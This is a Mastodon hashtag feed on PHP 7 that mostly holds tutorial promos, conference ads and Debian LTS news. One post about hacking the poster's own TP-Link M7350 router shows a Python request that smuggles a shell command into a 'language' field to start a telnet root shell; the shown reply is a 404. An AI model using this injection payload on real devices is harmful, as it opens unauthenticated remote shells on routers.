#PHP7

N-gated Hacker Newsngate
2026-03-04

PHP welcomes , clearly hoping her executive powers will magically fix 🍝✨. Maybe she'll summon 7.5 to finally do its own dishes, but hey, at least they'll have someone else to blame now 🙈.
thephp.foundation/blog/2026/02 .5

Python PeakPythonPeak
2026-02-21

Lambda vs Arrow Functions: Almost Identical!

Python lambda vs PHP 7.4 arrow functions - surprisingly similar! Same syntax, different keywords. Which looks better?

.4

youtube.com/watch?v=BkL4U9u0tcE

Turbo Learn PHPTurboLearnPHP
2026-02-16

PHP Array Destructuring Hack

Wait for it! PHP array destructuring lets you swap variables in one line. See [$a, $b] = [$b, $a]. One line, huge impact!

.1

youtube.com/watch?v=BCKs27NzXM4

Turbo Learn PHPTurboLearnPHP
2026-02-08

Arrow Functions vs Arrow Functions: Syntax Comparison

PHP 7.4+ arrow functions vs JavaScript arrow functions. Which language's arrow function syntax is more powerful? Mind = blown!

.4

youtube.com/watch?v=lXvcxkHJcBk

Turbo Learn PHPTurboLearnPHP
2026-01-23

PHP Null Coalescing Operator Secret

Stop scrolling! PHP ?? operator has a hidden trick. Watch null ?? 'default' ?? 'fallback'. The result will surprise you!

youtube.com/watch?v=AVWEeNrXnjs

Turbo Learn PHPTurboLearnPHP
2026-01-10

Lambda vs Arrow Functions: One-Line POWER Battle!

Python lambda vs PHP arrow functions - which is MORE POWERFUL? This debate is HEATED!

.4

youtube.com/watch?v=I5JLPre5g-0

2026-01-09
How very.. #odd
After a slight #lighhttpd change
----------------
server.modules = (
/ # # Uncomment the CGI assignment line
/ # sed -i 's|^#cgi.assign.*|cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )|' /etc/lighttpd.conf
/ # grep -n "cgi.assign" /etc/lighttpd.conf
141: cgi.assign = ( "" => "" )
144: cgi.assign = ( "" => "" )
248:cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )
/
-------------

and rebooting the #m7350 now #telnet will not renable again with the script.

Whats even weirder.

qcmap_web_cgi throws a 404..
I'm eternally confused

We still get a token no problemo, but somehow telnet is now closed and stays ?
(Why would a router reboot or slight lighttpd change cause this ?)

Should've enabled #adb while I had the chance haha.

Not eternally sad as I was running into brickwalls left and right with #php7 8 and #python ..
And even #perl has issues Ohwell




C:\Users\User>python -c "import requests; r=requests.post('http://192.168.0.1/qcmap_web_cgi', json={'token':'WPL3qTwBJ8YSmbz1','module':'webServer','action':1,'language':'\$(busybox telnetd -l /bin/sh -p 23)'}, headers={'Cookie':'tpweb_token=WPL3qTwBJ8YSmbz1'}); print(r.status_code, r.text)"
<string>&#58;1&#58; SyntaxWarning&#58; invalid escape sequence '\$'
404 <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http&#58;//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http&#58;//www.w3.org/1999/xhtml" xml&#58;lang="en" lang="en">
<head>
<title>404 - Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
</body>
</html>






#repost •acws #acws
2026-01-09
So you are trying to tell me that noone bothered to archive these #entware files
1592
phodav_2.5-1_armv7-3.2.ipk 18-Apr-2021 13:23 28453
php7-cgi_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1507945
php7-cli_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1527762
php7-fastcgi_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 786
php7-fpm_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1562752
php7-mod-bcmath_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 12214
php7-mod-calendar_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 10578
php7-mod-ctype_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 3104
php7-mod-curl_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 33116
php7-mod-dom_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 45322
php7-mod-exif_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 27343
php7-mod-fileinfo_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 401782
php7-mod-filter_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 15741
php7-mod-ftp_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 17577
php7-mod-gd_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 26089
php7-mod-gettext_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 4391


and now they are Gone ???

What is the #IT community even doing anyways ?
https://web.archive.org/web/20210613113743/https://bin.entware.net/armv7sf-k3.2/

Now I can't get a 2.2.7 GLIBC to be able to use #php 8


And I cannot get a #php7 which might just be compatible with my old one as there is no backup on da whole. wide. web

A
Ma
Zing.


:blobcatnotlike:

#repost •acws #acws #m7350 #tplink
Uploaded ListingOfLongGoneEntwarePHP7iPKs.jpg
Turbo Learn PHPTurboLearnPHP
2025-12-25

PHP Anonymous Class Trick

Wait for the reveal! PHP anonymous classes create objects on the fly. See new class {}. This will change your code style!

youtube.com/watch?v=2TNZPgNrP2I

Turbo Learn PHPTurboLearnPHP
2025-12-11

PHP Array Unpacking ... Operator

Stop scrolling! PHP ... operator unpacks arrays in ways you never imagined. See [...[1,2], ...[3,4]]. Mind = blown!

.4

youtube.com/watch?v=hdrzOj1s-JE

2025-11-23

Linux’ta PHP 7 ile XAMPP (LAMPP) kurmak artık basit. Terminal veya arayüz fark etmez, rehberimde tüm adımlar var.
yuceltoluyag.github.io/xampp-p

Freexian :debian:freexian@hachyderm.io
2025-09-12

The critical security updates for angular.js, tomcat9, mediawiki, php7.4 and more landed in Debian 11 "bullseye" by the efforts of the Debian LTS team in July 2025. The security tracker sprint involving members from the LTS team and Debian Security team also happened during July as part of DebCamp 25.

Get the full report covering the details here: freexian.com/blog/debian-lts-r

This work is funded by Freexian's Debian LTS offering. Your organization too can sponsor the Debian LTS (freexian.com/lts/debian/) and join the esteemed list of sponsors in the monthly report.

#debianlts #freexian #angular #php7.4

2025-01-30

Don't miss phpday 2025!🥳
The community is looking forward to joining Verona as soon as possible.
Tickets for 22nd edition are selling quickly!

Few early bird tickets are available.
🐤 bit.ly/3PPceLi

#API #REST #Architectures #ContinuousDelivery #Database #Development #Devops #Frameworks #Internals #PHP7 #PHP8 #conference #networking #community

-----
#phpday - The gathering for the European PHP community.
📍 Verona (Italy) | 📅 May 15-16, 2025

2025-01-27

Don't miss phpday 2025!🥳
The community is looking forward to joining Verona as soon as possible.
Tickets for 22nd edition are selling quickly!

Few early bird tickets are available.
🐤 bit.ly/3PPceLi

#API #REST #Architectures #ContinuousDelivery #Database #Development #Devops #Frameworks #Internals #PHP7 #PHP8 #conference #networking #community

-----
#phpday - The gathering for the European PHP community.
📍 Verona (Italy) | 📅 May 15-16, 2025

2024-09-18

Heute #Server von #Bullseye nach #Bookworm hochgepatcht. Wegen #Nextcloud muss aber noch #PHP7 installiert sein.

2024-06-05

PHP7からとのことで。
意外と前じゃないかw

#PHP7 #PHP

2024-03-09

急遽PHP7.4が必要になり、むりやりねじ込んだ。
これ、どこかで見た方法。あーなるほどね。

git clone git.freebsd.org/ports.git
cd ports
git checkout 27ac371f93d36f77f00b8da261e496904184dd33

#PHP7 #PHP #git

𝖆𝖒𝖆𝖗𝖔𝖐amarok@mastodonczech.cz
2024-01-27

I've made a thing. A simple file caching system for #PHP 🐘.
Nothing special, nothing new, there are probably many similar libraries around. But it works well and I use it in some of my own projects.
#backend #php7 #php8 #opensource
codeberg.org/amarok24/microcac

WPwatercooler Networkwpwatercooler@mastodon.online
2023-07-06

📣The era of PHP5 support is coming to an end #WordPress! Join us on WPwatercooler tomorrow, Friday at 11am PT, 2pm ET, 1800 UTC for our latest episode live, "Breaking Changes: WordPress 6.3 Drops PHP5." 💻

We'll be discussing the impactful shift from PHP5 to PHP7 and what this means for your site and the entire WordPress ecosystem.

@jasontucker
@boogah
@skc

🔗 Tune in live: wpwatercooler.com/devbranch/ep #PHP5 #PHP7 #security #WPwatercooler 🎙️

Client Info

Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst